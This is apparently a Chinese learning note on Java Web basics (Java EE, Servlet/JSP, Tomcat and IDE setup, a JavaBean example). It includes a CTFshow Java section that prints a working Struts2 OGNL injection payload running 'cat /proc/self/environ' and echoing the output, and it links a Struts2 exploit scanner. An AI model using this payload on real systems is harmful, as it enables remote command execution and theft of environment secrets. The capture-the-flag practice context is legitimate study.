发现一个总体学习路线:Java Web基础 – EastJun’s Blog
发现一个入门网站:https://how2j.cn/?p=50613
了解了javaEE
Java EE,Java 平台企业版(Java Platform Enterprise Edition),之前称为Java 2 Platform, Enterprise Edition (J2EE),2018年3月更名为 Jakarta EE(这个名称应该还没有得到群众认可)。是 Sun 公司为企业级应用推出的标准平台,用来开发B/S架构软件。Java EE 可以说是一个框架,也可以说是一种规范。
JavaEE 是 Java 应用最广泛的部分。
总而言之就是java web框架
一般来讲,初学者应该遵循以下路径
Servlet -> JSP -> Spring -> 组合框架
Servlet 和 JSP 在日后的开发中虽然很少直接应用,但却是各种框架的基础,应该放在开始去了解。这两部分也并不难,相信经过了 JavaSE(javaEE的基础框架) 的洗礼,只需要进行短期的学习,知道它们都是什么,就可以投入实践中了。
题目ctfshowjava
工具下载:(不过似乎有点问题)
HatBoy/Struts2-Scan: Struts2全漏洞扫描利用工具 (github.com)
工具使用参考:
[ctfshow web入门 (java) | Y0ng的博客 (yongsheng.site)](http://www.yongsheng.site/2021/04/04/ctfshow web入门 (java)/)
wp详解参考:(65条消息) CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现_OceanSec的博客-CSDN博客_编写payload
(65条消息) ctfshow java篇_penson by 小乌的博客-CSDN博客_ctfshow java
payload
%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}
然后原本还想用工具扫描利用,结果出了点问题,首先是url里面80端口不能省略,其次是S2-001不支持使用
环境搭建跑一个javaweb需要jdk(提供服务端语言java和他的环境)+tomcat(之类的web中间件)+idea(之类的ide来编辑,开发网站)
jdk如何下载网上教程极多,这里使用jdk 11.0.8
tomcat安装配置:JavaWeb学习总结(一)——JavaWeb开发入门 - 孤傲苍狼 - 博客园 (cnblogs.com)
配完环境变量以后启动tomcat也可以
startup
idea配置javaweb,参考
如果你和我一样找不到java ee还有web application的话,第一时间检测是否安装了旗舰版(学生免费),不是的话卸载重装;如果是的话,可能你的版本得像我的这样才行
点击next后运行汤姆猫
随后会自动跳转
如果configurations下面打叉,点开后有warning的话,看看是不是遇到了这个问题(67条消息) 【错误解决】Intellj(IDEA) warning no artifacts configured_鼠小的博客-CSDN博客
倘若你是用eclipse的,要搭建Eclipse JSP/Servlet 环境,假定你已安装了 JDK 环境,如未安装,可参阅 Java 开发环境配置 。
我们可以使用 Eclipse 来搭建 JSP 开发环境,首先我们分别下载一下软件包:
**Eclipse J2EE:**http://www.eclipse.org/downloads/**Tomcat:**http://tomcat.apache.org/download-70.cgi
之后根据菜鸟Eclipse JSP/Servlet 环境搭建 | 菜鸟教程 (runoob.com)进行配置
接下来便是简单的web知识学习
基础jsp知识建议跟着菜鸟来一遍,从这里开始JSP 语法 | 菜鸟教程 (runoob.com)
可以一直看到
看不明白的可以看看miku大神的博客https://miku233.cn/2022/03/24/javaweb/
jsp动作元素那一块的知识,由于菜鸟示例中用的是Eclipse搭建,所以这里可以按照我的来复现:
正常你会发现这有三个一样的东西
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kuwqkRbg-1648355058882)(C:/Users/20281/AppData/Roaming/Typora/typora-user-images/image-20220325212259676.png)]
这与菜鸟里面的描述是很相似的,大胆推测我们直接在某处写java就可以自动部署上去了
new 一个testbean.class,内容如下
package com.example.demo2;
public class TestBean {
private String message = "菜鸟教程";
public String getMessage() {
return(message);
}
public void setMessage(String message) {
this.message = message;
}
}
后面在index.jsp同级目录下新建main.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
菜鸟教程(runoob.com)
Jsp 使用 JavaBean 实例
输出信息....
之后访问/main.jsp
